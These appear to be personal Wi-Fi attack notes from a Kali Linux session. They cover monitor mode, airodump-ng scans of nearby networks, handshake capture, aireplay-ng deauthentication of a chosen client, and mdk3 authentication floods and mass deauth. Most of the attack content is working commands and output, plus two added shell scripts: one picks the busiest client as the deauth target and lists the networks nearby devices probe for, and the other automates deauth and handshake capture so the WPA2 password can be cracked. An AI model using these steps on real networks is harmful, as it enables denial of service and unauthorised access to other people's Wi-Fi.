Wireless Network Attack Notes

1. Checking the inserted adapter

iwconfig    -- list wireless interfaces (in the listing below the adapter is already in monitor mode as wlan0mon)
┌──(root💀Kali)-[~] 
└─# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.442 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
lsusb           -- list all attached USB devices (the Ralink RT5370 is the external Wi-Fi adapter)
┌──(root💀Kali)-[~]
└─# lsusb
Bus 001 Device 003: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 003: ID 203a:fffc PARALLELS Virtual Mouse
Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
airmon-ng   -- list wireless adapters with their driver and chipset
┌──(root💀Kali)-[~]
└─# airmon-ng            

PHY Interface   Driver      Chipset

phy1    wlan0mon    rt2800usb   Ralink Technology, Corp. RT5370

2. Enabling and disabling monitor mode

airmon-ng start wlan0     -- put the adapter into monitor mode; note the monitor interface name it reports (wlan0mon here) and first kill the processes that would interfere, as the warning below says (airmon-ng check kill). That kill stops NetworkManager and wpa_supplicant, so the machine loses its own managed Wi-Fi connection until they are restarted.
┌──(root💀Kali)-[~]
└─# airmon-ng start wlan0  

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    447 NetworkManager
  13930 wpa_supplicant

PHY Interface   Driver      Chipset

phy1    wlan0       rt2800usb   Ralink Technology, Corp. RT5370
        (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
        (mac80211 station mode vif disabled for [phy1]wlan0)

================================================================================
airmon-ng stop wlan0mon     -- leave monitor mode (the managed interface wlan0 comes back; restart NetworkManager afterwards if you ran 'airmon-ng check kill')
┌──(root💀Kali)-[~]
└─# airmon-ng stop wlan0mon                                                                                                         130 ⨯

PHY Interface   Driver      Chipset

phy1    wlan0mon    rt2800usb   Ralink Technology, Corp. RT5370
        (mac80211 station mode vif enabled on [phy1]wlan0)
        (mac80211 monitor mode vif disabled for [phy1]wlan0mon)

3. Scanning for Wi-Fi networks (for 5 GHz the band must be given explicitly)

airodump-ng wlan0mon        -- hops the 2.4 GHz channels by default; pass --band a (or --band abg for both bands) to see 5 GHz networks, which needs a dual-band adapter (the RT5370 above is 2.4 GHz only)
Fields in the upper (AP) table:
        BSSID:     MAC address of the access point
        PWR:       signal level reported by the driver, in dBm: the closer to 0 the stronger the signal (-24 is far stronger than -62). -1 means the driver does not report a signal level
        Beacons:   number of beacon (announcement) frames captured from the AP; an AP sends roughly 10 per second at the lowest rate (1 Mbit/s)
        #Data:     number of data frames captured from this AP (for WEP, the number of unique IVs), broadcast data included; the higher it is, the more traffic the AP is carrying
        #/s:       data frames per second, measured over the last 10 seconds
        CH:        channel, taken from the beacon
        MB:        maximum rate the AP supports (Mbit/s). 11 = 802.11b, 22 = 802.11b+, higher values = 802.11g/n; a trailing '.' means short preamble is supported, an 'e' means QoS (802.11e) is enabled
        ENC:       encryption in use. OPN = none; WEP? = WEP or better, not enough data yet to tell WEP from WPA/WPA2; WEP (no question mark) = static or dynamic WEP; WPA/WPA2 once TKIP or CCMP has been seen
        CIPHER:    cipher detected, one of CCMP, WRAP, TKIP, WEP, WEP40, WEP104. Usually (not always) TKIP goes with WPA and CCMP with WPA2. WEP40 is shown when the key index is greater than 0: the standard allows index 0-3 for 40-bit keys and only index 0 for 104-bit keys
        AUTH:      authentication in use: MGT (WPA/WPA2 with a separate authentication server, i.e. 802.1X/enterprise), SKA (WEP shared key), PSK (WPA/WPA2 pre-shared key) or OPN (open, WEP)
        ESSID:     the network name (SSID). A hidden SSID is shown as <length: N> (N is the length of the hidden name, 0 when the beacon carries an empty SSID) until a client's probe or association reveals it, like the first AP in the scan below
Fields in the lower (station) table:
        BSSID:     MAC address of the AP the station is associated with; stations that are not associated (still searching) show (not associated) here
        STATION:   MAC address of the client, whether it is connected or only probing for a network to join
        PWR:       signal level of the station, same meaning as above. -1 for a station means this card only heard frames from the AP to that client; the client itself is out of range
        Rate:      last seen receive rate, then transmit rate, of the station; an 'e' after a rate means QoS frames
        Lost:      data frames lost over the last 10 seconds, detected from gaps in the sequence number
        Frames:    number of data frames sent by the client
        Notes:     additional information about the client, e.g. that EAPOL or PMKID frames were captured (depends on the airodump-ng version)
        Probes:    ESSIDs the client is probing for. If it is trying to join a network it is not yet associated with, that name shows here

┌──(root💀Kali)-[~]
└─# airodump-ng wlan0mon
 CH 12 ][ Elapsed: 0 s ][ 2021-09-01 22:19 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 34:96:72:67:DA:13  -59        0        2    0   6   -1   WPA              <length:  0>                                                  
 54:92:09:2A:EB:E0  -41        1        0    0   6  300   WPA2 CCMP   PSK  7dingdong                                                     
 30:FC:68:90:AE:0B  -48        3        1    0   6  405   WPA2 CCMP   PSK  TP-LINK_AE0B                                                  
 F0:B4:29:D9:DD:99  -45        2        0    0  11  130   WPA2 CCMP   PSK  SanheSoft                                                     
 EC:23:7B:32:FA:38  -41        2        0    0  11  130   WPA2 CCMP   PSK  ChinaNet-CJGd                                                 
 F4:83:CD:FF:A2:59  -62        2        0    0  11  405   WPA2 CCMP   PSK  TP-LINK_A8367                                                 
 EC:F8:EB:E0:45:49  -68        2        0    0   9  130   WPA2 CCMP   PSK  ChinaNet-f3AU                                                 
 20:76:93:52:57:CE  -16        4        0    0  12  270   WPA2 CCMP   PSK  PDCN                                                          
 EC:6C:B5:8F:0C:85  -51        1        0    0   9  130   WPA2 CCMP   PSK  CU_3HjA                                                       
 EC:23:7B:32:BD:58  -41        3        0    0   9  130   WPA2 CCMP   PSK  ChinaNet-vpyV                                                 
 8C:DC:02:33:66:31  -38        3        0    0   9  130   WPA2 CCMP   PSK  CU_fP7c                                                       
 EC:23:7B:32:E2:18  -53        3        0    0   9  130   WPA2 CCMP   PSK  ChinaNet-umti                                                 
 C0:9F:E1:74:C2:38  -53        2       35   16   3  130   WPA2 CCMP   PSK  8151                                                          
 EC:23:7B:32:C9:68  -45        3        0    0   2  130   WPA2 CCMP   PSK  ChinaNet-gDWT                                                 
 D0:76:E7:BB:78:60  -23        3        2    0   7  270   WPA2 CCMP   PSK  YUNYI_2.4G                                                    
 EC:23:7B:32:E2:C0  -47        2        0    0   1  130   WPA2 CCMP   PSK  ChinaNet-NVXM                                                 
 80:41:26:58:FE:D4  -35        2        0    0   1  130   WPA2 CCMP   PSK  CU_Aeg3                                                       

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 34:96:72:67:DA:13  BE:D1:05:12:0C:12   -1    1e- 0      0        2                                                                      
 54:92:09:2A:EB:E0  56:69:E8:06:E2:6C  -42    0 - 1      0       12                                                                      
 30:FC:68:90:AE:0B  B6:30:E3:4F:31:A1   -1    2e- 0      0        1                                                                      
 (not associated)   78:11:DC:AC:BF:32  -34    0 - 1      0        4         KSCQ_office_2.4                                              
 F0:B4:29:D9:DD:99  64:6C:80:74:BE:85  -64    0 -24      0        1                                                                      
 C0:9F:E1:74:C2:38  50:2B:73:A0:1E:91  -64    0 -24e     0        1                                                                      
 C0:9F:E1:74:C2:38  30:B4:9E:97:26:72  -54    0 - 6      0        4                                                                      
 C0:9F:E1:74:C2:38  02:C4:4B:63:02:52  -62    0 - 6      1        2                                                                      
 C0:9F:E1:74:C2:38  14:5F:94:88:34:E8   -1    6e- 0      0       34                                                                      

4. Listing the clients connected to a given AP (and capturing its handshake)

airodump-ng -c 6 -w Desktop/handshake --bssid C0:00:00:00:00:48 wlan0mon
airodump-ng -c <AP channel> -w <output file prefix; the capture, handshake included, is written to <prefix>-01.cap> --bssid <AP MAC address> <monitor interface name>
Locking to one channel with -c is required: a card that keeps hopping misses the client's handshake. The extra RXQ column in the output below is receive quality, the percentage of the AP's frames (management and data) successfully received over the last 10 seconds; it is only shown when locked to a channel.

┌──(root💀Kali)-[~]
└─# airodump-ng -c 7 --bssid D0:76:E7:BB:78:60 wlan0mon        
 CH  7 ][ Elapsed: 12 s ][ 2021-09-01 22:30 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 D0:76:E7:BB:78:60  -24 100      117       45    1   7  270   WPA2 CCMP   PSK  YUNYI_2.4G                                                

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 D0:76:E7:BB:78:60  9C:99:A0:5A:0F:37  -24    0 - 6      0        1                                                                      
 D0:76:E7:BB:78:60  64:90:C1:34:7D:56  -34    0 - 1e     0        3                                                                      
 D0:76:E7:BB:78:60  5C:EA:1D:0E:B7:01  -34    1e- 6e     0        5                                                                      
Quitting...
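The airodump-ng run above also writes a <prefix>-01.csv (when -w is given) containing the same two tables as the screen. The following script is an added example and not part of the original notes: it parses that CSV to list the APs (flagging hidden SSIDs such as the first one in the section 3 scan), rank the clients of one BSSID by traffic so the best deauth target can be picked, and list unassociated stations with the ESSIDs they probe for. It assumes the airodump-ng 1.x CSV layout (AP table, blank line, station table); the sample file it builds is constructed from the scans shown above with made-up timestamps, and the script name airodump_csv.sh is a placeholder.

```shell
#!/bin/sh
# Added example, not code from the original notes. "airodump-ng -w <prefix>"
# also writes its two tables to <prefix>-01.csv; parsing that file lets a
# script pick the target AP and the client to deauthenticate instead of
# reading them off the live screen.
# Assumptions: POSIX sh + awk; the CSV layout written by airodump-ng 1.x
# (AP table, blank line, station table, ", " separators, CRLF line ends).
# ESSIDs that themselves contain a comma are not handled.

# Every awk program below starts with t(): strip surrounding spaces and CRs from a field.
AWK_TRIM='function t(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }'

# APs as "BSSID channel privacy ESSID"; a hidden SSID (empty ESSID column) prints as <hidden>.
airodump_aps() {    # $1 = path to <prefix>-01.csv
    awk -F',' "$AWK_TRIM"'
        /^BSSID, *First time seen/       { sec = "ap"; next }
        /^Station MAC, *First time seen/ { sec = "st"; next }
        sec == "ap" && NF >= 14 {
            essid = t($14); if (essid == "") essid = "<hidden>"
            printf "%s %s %s %s\n", t($1), t($4), t($6), essid
        }' "$1"
}

# Clients of one AP as "station packets power", busiest first (a busy client
# reconnects quickly after a deauth, so it is the best handshake source).
airodump_clients() {    # $1 = csv, $2 = AP BSSID (any case)
    awk -F',' -v bssid="$2" "$AWK_TRIM"'
        /^Station MAC, *First time seen/ { sec = "st"; next }
        sec == "st" && NF >= 6 && toupper(t($6)) == toupper(bssid) {
            printf "%s %s %s\n", t($1), t($5), t($4)
        }' "$1" | sort -k2,2nr
}

busiest_client() {    # $1 = csv, $2 = AP BSSID; prints one station MAC (empty if none)
    airodump_clients "$1" "$2" | head -n 1 | cut -d' ' -f1
}

# Stations not associated with any AP, with the ESSIDs they probe for. These
# leak the names of networks the device trusts (home and office SSIDs).
airodump_probes() {    # $1 = csv
    awk -F',' "$AWK_TRIM"'
        /^Station MAC, *First time seen/ { sec = "st"; next }
        sec == "st" && NF >= 7 && t($6) == "(not associated)" {
            probes = ""
            for (i = 7; i <= NF; i++) if (t($i) != "") probes = probes (probes == "" ? "" : ",") t($i)
            printf "%s %s\n", t($1), (probes == "" ? "-" : probes)
        }' "$1"
}

# Constructed sample in the CSV layout, using the APs and stations from the scans above
# (timestamps are made up).
write_sample_csv() {    # $1 = path to write
    cat > "$1" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
34:96:72:67:DA:13, 2021-09-01 22:19:01, 2021-09-01 22:19:05, 6, -1, WPA, , , -59, 0, 2, 0. 0. 0. 0, 0, ,
54:92:09:2A:EB:E0, 2021-09-01 22:19:01, 2021-09-01 22:19:13, 6, 300, WPA2, CCMP, PSK, -41, 1, 0, 0. 0. 0. 0, 9, 7dingdong,
D0:76:E7:BB:78:60, 2021-09-01 22:19:01, 2021-09-01 22:30:13, 7, 270, WPA2, CCMP, PSK, -24, 117, 45, 0. 0. 0. 0, 10, YUNYI_2.4G,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
9C:99:A0:5A:0F:37, 2021-09-01 22:30:01, 2021-09-01 22:30:13, -24, 1, D0:76:E7:BB:78:60,
64:90:C1:34:7D:56, 2021-09-01 22:30:01, 2021-09-01 22:30:13, -34, 3, D0:76:E7:BB:78:60,
5C:EA:1D:0E:B7:01, 2021-09-01 22:30:01, 2021-09-01 22:30:13, -34, 5, D0:76:E7:BB:78:60,
78:11:DC:AC:BF:32, 2021-09-01 22:19:01, 2021-09-01 22:19:10, -34, 4, (not associated), KSCQ_office_2.4
EOF
}

# Usage: sh airodump_csv.sh <prefix>-01.csv <target BSSID>
if [ "$#" -eq 2 ] && [ -f "$1" ]; then
    airodump_aps "$1"
    echo "--- clients of $2, busiest first ---"
    airodump_clients "$1" "$2"
    echo "--- unassociated stations and the ESSIDs they probe for ---"
    airodump_probes "$1"
fi
```

Run it against a real capture with `sh airodump_csv.sh handshake-01.csv D0:76:E7:BB:78:60`; the busiest_client output is the value to hand to aireplay-ng's -c in the next section. The trim function matters on real files, which use ", " separators and CRLF line ends.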

5. Deauthentication attack on a specific client (forces that client off the network)

aireplay-ng -0 0 -a C0:00:00:00:00:48 -c 18:00:00:00:00:88 wlan0mon
aireplay-ng -<attack mode, 0 = deauthentication> <count, 0 = keep sending until stopped> -a <AP MAC address> -c <client MAC address> <monitor interface name>
Leave out -c to broadcast the deauth to every client of the AP. The card must be on the AP's channel, so run this while the airodump-ng capture from section 4 is locked to it with -c; the kicked client reconnects and its 4-way handshake lands in the capture file. Clients and APs using 802.11w (Protected Management Frames, mandatory in WPA3) ignore forged deauth frames, so a small count such as the 10 below is enough to see whether the attack works at all. Each line of output is one burst of 64 frames with reason code 7; the bracket shows ACKs received from the client and from the AP. A 0 on the left, as in most lines below, means the client never acknowledged, typically because it is out of range of your card even though the AP is not.
┌──(root💀Kali)-[~]
└─# aireplay-ng -0 10 -a D0:76:E7:BB:78:60 -c 9C:99:A0:5A:0F:37 wlan0mon                                                            130 ⨯
22:32:38  Waiting for beacon frame (BSSID: D0:76:E7:BB:78:60) on channel 7
22:32:38  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|53 ACKs]
22:32:39  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|58 ACKs]
22:32:40  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|54 ACKs]
22:32:40  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 8|56 ACKs]
22:32:41  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|54 ACKs]
22:32:41  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [12|56 ACKs]
22:32:42  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|45 ACKs]
22:32:42  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 7|50 ACKs]
22:32:43  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [15|49 ACKs]
22:32:43  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|49 ACKs]
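Sections 2, 4 and 5 chained into one script, as an added example that is not the original notes' code: it enables monitor mode, locks airodump-ng to the AP's channel, sends a bounded directed deauth to one client and then checks that the capture really contains a 4-way handshake before leaving monitor mode. It assumes root on Kali with aircrack-ng installed, wlan0 as the managed interface, systemd for restarting NetworkManager, and BSSID, channel and client MAC taken from an earlier scan; the prefix "handshake" and the script name are placeholders. The helpers that need no hardware (valid_mac, monitor_name_from_output) are written against the airmon-ng output shown in section 2.

```shell
#!/bin/sh
# Added example, not code from the original notes: sections 2, 4 and 5 above as one
# script that puts the card in monitor mode, captures the chosen AP on its channel,
# sends a bounded directed deauth to one client and then checks that the capture
# really contains a 4-way handshake before leaving monitor mode.
# Assumptions: run as root on Kali with aircrack-ng installed; the managed interface
# is wlan0 (change IFACE); BSSID, channel and client MAC come from an earlier
# airodump-ng scan; the file prefix "handshake" is a placeholder.

IFACE=wlan0

valid_mac() {    # aa:bb:cc:dd:ee:ff, either case
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Pull the monitor interface name out of "airmon-ng start" output, i.e. the line
# "(mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)".
monitor_name_from_output() {
    sed -n 's/.*monitor mode vif enabled .* on \[phy[0-9]*\]\([A-Za-z0-9_-]*\)).*/\1/p' | head -n 1
}

start_monitor() {    # $1 = managed interface; prints the monitor interface name
    airmon-ng check kill >/dev/null     # stops NetworkManager and wpa_supplicant: your own Wi-Fi link drops
    mon=$(airmon-ng start "$1" | monitor_name_from_output)
    [ -n "$mon" ] || mon="${1}mon"      # wording differs between airmon-ng versions; fall back to the usual name
    printf '%s\n' "$mon"
}

stop_monitor() {     # $1 = monitor interface; also bring NetworkManager back (assumes systemd, as on Kali)
    airmon-ng stop "$1" >/dev/null
    systemctl start NetworkManager 2>/dev/null || true
}

# True if the capture holds at least one WPA handshake: aircrack-ng's network list
# prints "WPA (1 handshake)" / "WPA (0 handshake)" per BSSID; no wordlist is needed.
has_handshake() {    # $1 = .cap file
    aircrack-ng "$1" </dev/null 2>/dev/null | grep -Eq 'WPA \([1-9][0-9]* handshake'
}

capture_handshake() {    # $1 monitor iface, $2 AP BSSID, $3 channel, $4 client MAC, $5 file prefix
    if ! valid_mac "$2" || ! valid_mac "$4"; then
        echo "bad MAC address: $2 / $4" >&2; return 2
    fi
    # Lock to the AP's channel (-c) and that BSSID only, writing $5-01.cap. airodump must be
    # on the channel before the deauth goes out or the handshake frames are never captured.
    airodump-ng -c "$3" --bssid "$2" -w "$5" "$1" >/dev/null 2>&1 &
    dump=$!
    sleep 5
    # 5 bursts of directed deauth (64 frames each), not "-0 0": a client or AP using 802.11w
    # (PMF, mandatory in WPA3) ignores these anyway, so an endless flood gains nothing.
    aireplay-ng -0 5 -a "$2" -c "$4" "$1" >/dev/null 2>&1
    sleep 10                              # give the client time to reconnect and redo the handshake
    kill "$dump" 2>/dev/null; wait "$dump" 2>/dev/null || true
    cap=$(ls "$5"-*.cap 2>/dev/null | tail -n 1)
    if [ -n "$cap" ] && has_handshake "$cap"; then
        echo "handshake captured in $cap"
    else
        echo "no handshake in ${cap:-$5-*.cap}: client out of range, PMF enabled, or it did not reconnect" >&2
        return 1
    fi
}

# Usage: ./capture_handshake.sh <AP BSSID> <channel> <client MAC> [prefix]
# e.g. with the values from the scan above: D0:76:E7:BB:78:60 7 9C:99:A0:5A:0F:37
if [ "$#" -ge 3 ] && [ "$(id -u)" -eq 0 ] && command -v aireplay-ng >/dev/null; then
    mon=$(start_monitor "$IFACE")
    capture_handshake "$mon" "$1" "$2" "$3" "${4:-handshake}"
    stop_monitor "$mon"
fi
```

The handshake check is the step the notes skip: a capture can contain the deauth bursts and still no EAPOL frames, and aircrack-ng's "(0 handshake)" tells you before any dictionary run is wasted. has_handshake only needs aircrack-ng's network listing, so it runs without a wordlist.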

6. Attacking a specific AP with mdk3 (forces all clients off that AP)

Authentication flood against one AP (mode a): floods it with fake stations until its client table is full, which freezes or resets many APs
mdk3 wlan0mon a -a D8:CE:3A:1F:5D:3D
Deauthentication/disassociation "amok" mode (mode d) restricted to channel 2: kicks every client off every AP seen on that channel
mdk3 wlan0mon d -c 2
Same, but skip the AP MAC addresses listed in SSID.txt (a whitelist of MACs, one per line, despite the file name) and hit everything else
mdk3 wlan0mon d -c 2 -w "SSID.txt"
In the run below the AP keeps answering after thousands of fake clients, which mdk3 reports as INVULNERABLE: the flood had no effect on this AP.
┌──(root💀Kali)-[~]
└─# mdk3 wlan0mon a -a D8:CE:3A:1F:5D:3D
AP D8:CE:3A:1F:5D:3D is responding!           
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with   500 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  1000 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  1500 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  2000 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  2500 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  3000 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  3500 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  4000 clients connected!